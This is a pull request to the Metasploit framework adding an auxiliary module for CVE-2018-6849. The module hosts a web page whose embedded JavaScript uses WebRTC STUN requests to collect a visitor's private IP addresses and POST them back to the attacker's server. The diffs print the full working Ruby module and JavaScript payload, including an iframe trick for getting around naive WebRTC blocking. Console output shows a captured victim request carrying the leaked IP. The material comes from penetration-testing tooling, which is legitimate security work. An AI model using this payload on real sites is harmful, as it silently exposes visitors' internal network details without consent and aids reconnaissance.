### PR TITLE
Private IP Leakage using WebRTC (CVE-2018-6849)

### DIFF
--- a/documentation/modules/auxiliary/gather/browser_getprivateip.md
+++ b/documentation/modules/auxiliary/gather/browser_getprivateip.md
@@ -1,0 +1,46 @@
+## Vulnerable Application
+
+This module retrieves a browser's network interface IP addresses using WebRTC. However, after visiting the HTTP server, the browser can disclose a private IP address in a STUN request.
+
+Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html
+
+## Verification
+
+    Start msfconsole
+    use auxiliary/gather/browser_lanipleak
+    Set SRVHOST
+    Set SRVPORT
+    run (Server started)
+Visit server URL in any browser which has WebRTC enabled
+
+## Scenarios
+
+```
+msf auxiliary(gather/browser_lanipleak) > show options 
+
+Module options (auxiliary/gather/browser_lanipleak):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  192.168.1.104    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   WebServer  
+
+
+msf auxiliary(gather/browser_lanipleak) > run
+[*] Auxiliary module running as background job 0.
+msf auxiliary(gather/browser_lanipleak) > 
+[*] Using URL: http://192.168.1.104:8080/mIV1EgzDiEEIMT
+[*] Server started.
+
+msf auxiliary(gather/browser_lanipleak) >
+```

--- a/modules/auxiliary/gather/browser_getprivateip.rb
+++ b/modules/auxiliary/gather/browser_getprivateip.rb
@@ -10,13 +10,13 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
-        'Description'    => %q(
-          This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
-        ),
+        'Name'           => "Private IP Leakage to WebPage using WebRTC Function",
+       'Description'    => %q{
+        This module uses WebRTC component to gather complete client information and browser can
+        disclose a private IP address in a STUN request.
+      },
         'License'        => MSF_LICENSE,
         'Author'         => [
-          'Brendan Coles', #MSF Module
           'Dhiraj Mishra'  #MSF Module
           'Daniel Roesler'  #JS Code
         ],
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'CVE', '2018-6849' ],
           ['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
         ],
-        'DisclosureDate' => 'Jan 26 2018',
+        'DisclosureDate' => 'Sep 5 2013',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
         'DefaultAction'  => 'WebServer'
@@ -130,13 +130,13 @@ getIPs(function(ip){
   def on_request_uri(cli, request)
     case request.method.downcase
     when 'get'
-      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
+      print_good("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
       send_response(cli, @html)
     when 'post'
-      print_status("#{cli.peerhost}: Received reply:")
+      print_good("#{cli.peerhost}: Received reply:")
       puts request.to_s
     else
-      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
+      print_good("#{cli.peerhost}: Unhandled method: #{request.method}")
     end
   end
 end

--- a/modules/auxiliary/gather/browser_getprivateip.rb
+++ b/modules/auxiliary/gather/browser_getprivateip.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
+        'Description'    => %q(
+          This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Brendan Coles', #MSF Module
+          'Dhiraj Mishra'  #MSF Module
+          'Daniel Roesler'  #JS Code
+        ],
+        'References'     => [
+          [ 'CVE', '2018-6849' ],
+          ['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
+        ],
+        'DisclosureDate' => 'Jan 26 2018',
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+     # code from: https://github.com/diafygi/webrtc-ips
+     @html = <<-JS
+<script>
+//get the IP addresses associated with an account
+function getIPs(callback){
+    var ip_dups = {};
+
+    //compatibility for firefox and chrome
+    var RTCPeerConnection = window.RTCPeerConnection
+        || window.mozRTCPeerConnection
+        || window.webkitRTCPeerConnection;
+    var useWebKit = !!window.webkitRTCPeerConnection;
+
+    //bypass naive webrtc blocking using an iframe
+    if(!RTCPeerConnection){
+        //NOTE: you need to have an iframe in the page right above the script tag
+        //
+        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
+        //<script>...getIPs called in here...
+        //
+        var win = iframe.contentWindow;
+        RTCPeerConnection = win.RTCPeerConnection
+            || win.mozRTCPeerConnection
+            || win.webkitRTCPeerConnection;
+        useWebKit = !!win.webkitRTCPeerConnection;
+    }
+
+    //minimal requirements for data connection
+    var mediaConstraints = {
+        optional: [{RtpDataChannels: true}]
+    };
+
+    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
+
+    //construct a new RTCPeerConnection
+    var pc = new RTCPeerConnection(servers, mediaConstraints);
+
+    function handleCandidate(candidate){
+        //match just the IP address
+        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
+        var ip_addr = ip_regex.exec(candidate)[1];
+
+        //remove duplicates
+        if(ip_dups[ip_addr] === undefined)
+            callback(ip_addr);
+
+        ip_dups[ip_addr] = true;
+    }
+
+    //listen for candidate events
+    pc.onicecandidate = function(ice){
+
+        //skip non-candidate events
+        if(ice.candidate)
+            handleCandidate(ice.candidate.candidate);
+    };
+
+    //create a bogus data channel
+    pc.createDataChannel("");
+
+    //create an offer sdp
+    pc.createOffer(function(result){
+
+        //trigger the stun server request
+        pc.setLocalDescription(result, function(){}, function(){});
+
+    }, function(){});
+
+    //wait for a while to let everything done
+    setTimeout(function(){
+        //read candidate info from local description
+        var lines = pc.localDescription.sdp.split('\\n');
+
+        lines.forEach(function(line){
+            if(line.indexOf('a=candidate:') === 0)
+                handleCandidate(line);
+        });
+    }, 1000);
+}
+
+getIPs(function(ip){
+  //console.log(ip);
+  var xmlhttp = new XMLHttpRequest;
+  xmlhttp.open('POST', window.location, true);
+  xmlhttp.send(ip);
+});
+</script>
+     JS
+  end
+
+  def on_request_uri(cli, request)
+    case request.method.downcase
+    when 'get'
+      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
+      send_response(cli, @html)
+    when 'post'
+      print_status("#{cli.peerhost}: Received reply:")
+      puts request.to_s
+    else
+      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
+    end
+  end
+end

--- a/modules/auxiliary/gather/browser_getprivateip.rb
+++ b/modules/auxiliary/gather/browser_getprivateip.rb
@@ -10,21 +10,21 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "Private IP Leakage to WebPage using WebRTC Function",
-       'Description'    => %q{
+        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
+        'Description'    => %q(
         This module uses WebRTC component to gather complete client information and browser can
         disclose a private IP address in a STUN request.
-      },
+        ),
         'License'        => MSF_LICENSE,
         'Author'         => [
+          'Daniel Roesler', #JS Code
           'Dhiraj Mishra'  #MSF Module
-          'Daniel Roesler'  #JS Code
         ],
         'References'     => [
           [ 'CVE', '2018-6849' ],
           ['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
         ],
-        'DisclosureDate' => 'Sep 5 2013',
+        'DisclosureDate' => 'Sep 05 2013',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
         'DefaultAction'  => 'WebServer'

--- a/modules/auxiliary/gather/browser_lanipleak.rb
+++ b/modules/auxiliary/gather/browser_lanipleak.rb
@@ -5,25 +5,26 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpServer
-  require 'ipaddr'
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => "HTTP Client LAN IP Address Gather",
+        'Name'           => 'HTTP Client LAN IP Address Gather',
         'Description'    => %q(
-        This module retrieves a browser's network interface IP addresses using WebRTC
+          This module retrieves a browser's network interface IP addresses
+          using WebRTC.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
-          'Daniel Roesler', #JS Code
-          'Dhiraj Mishra'  #MSF Module
-        ],
+          'Daniel Roesler', # JS Code
+          'Dhiraj Mishra'   # MSF Module
+         ],
         'References'     => [
-          [ 'CVE', '2018-6849' ],
-          ['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
-        ],
+           [ 'CVE', '2018-6849' ],
+           [ 'URL', 'http://net.ipcalf.com/' ],
+           [ 'URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html' ]
+         ],
         'DisclosureDate' => 'Sep 05 2013',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
@@ -133,15 +134,16 @@ getIPs(function(ip){
       print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
       send_response(cli, @html)
     when 'post'
-      print_status("#{cli.peerhost}: Received reply:")
-      values = request.to_s.split("\n")
-      values.each do |value|
-         begin
-            ip = IPAddr.new value
-            print_line("Fetched Private IP: #{ip.to_s}")
-         rescue
-         end
-     end
+      begin
+        ip = request.body
+        if ip =~ /\A([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\z/
+          print_good("#{cli.peerhost}: Found IP address: #{ip}")
+        else
+          print_error("#{cli.peerhost}: Received malformed IP address")
+        end
+      rescue
+        print_error("#{cli.peerhost}: Received malformed reply")
+      end
     else
       print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
     end

--- a/modules/auxiliary/gather/browser_lanipleak.rb
+++ b/modules/auxiliary/gather/browser_lanipleak.rb
@@ -5,15 +5,15 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpServer
+  require 'ipaddr'
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
+        'Name'           => "HTTP Client LAN IP Address Gather",
         'Description'    => %q(
-        This module uses WebRTC component to gather complete client information and browser can
-        disclose a private IP address in a STUN request
+        This module retrieves a browser's network interface IP addresses using WebRTC
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -134,7 +134,14 @@ getIPs(function(ip){
       send_response(cli, @html)
     when 'post'
       print_status("#{cli.peerhost}: Received reply:")
-      print_line("#{puts request.to_s}")
+      values = request.to_s.split("\n")
+      values.each do |value|
+         begin
+            ip = IPAddr.new value
+	    print_line("Fetched Private IP: #{ip.to_s}")
+         rescue
+         end
+     end
     else
       print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
     end

--- a/modules/auxiliary/gather/browser_lanipleak.rb
+++ b/modules/auxiliary/gather/browser_lanipleak.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
         'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
         'Description'    => %q(
         This module uses WebRTC component to gather complete client information and browser can
-        disclose a private IP address in a STUN request.
+        disclose a private IP address in a STUN request
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -130,13 +130,13 @@ getIPs(function(ip){
   def on_request_uri(cli, request)
     case request.method.downcase
     when 'get'
-      print_good("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
+      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
       send_response(cli, @html)
     when 'post'
-      print_good("#{cli.peerhost}: Received reply:")
-      puts request.to_s
+      print_status("#{cli.peerhost}: Received reply:")
+      print_line("#{puts request.to_s}")
     else
-      print_good("#{cli.peerhost}: Unhandled method: #{request.method}")
+      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
     end
   end
 end

--- a/modules/auxiliary/gather/browser_lanipleak.rb
+++ b/modules/auxiliary/gather/browser_lanipleak.rb
@@ -138,7 +138,7 @@ getIPs(function(ip){
       values.each do |value|
          begin
             ip = IPAddr.new value
-	    print_line("Fetched Private IP: #{ip.to_s}")
+            print_line("Fetched Private IP: #{ip.to_s}")
          rescue
          end
      end


### PR DESCRIPTION
This ~library~ module will take advantage of WebRTC function in browsers to get private IP of the user/victim.

## Verification
* Start `msfconsole`
*  `use auxiliary/gather/browser_lanipleak`
*  `set SRVHOST <IP of MSF system to act as server>`
*  `set SRVPORT <port of MSF system to act as server>`
*  `run`

```
msf auxiliary(gather/browser_getprivateip) > 
[*] Using URL: http://172.20.10.2:8080/
[*] Server started.

msf auxiliary(gather/browser_getprivateip) >



msf auxiliary(gather/browser_getprivateip) > 
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Received reply:
POST / HTTP/1.1
Host: 172.20.10.2:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.20.10.2:8080/
Content-Length: 11
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

172.20.10.2

msf auxiliary(gather/browser_getprivateip) >
```
Note that there are some edge cases with this code. For example, it doesn't work on Firefox ESR on Kali 1.0.6.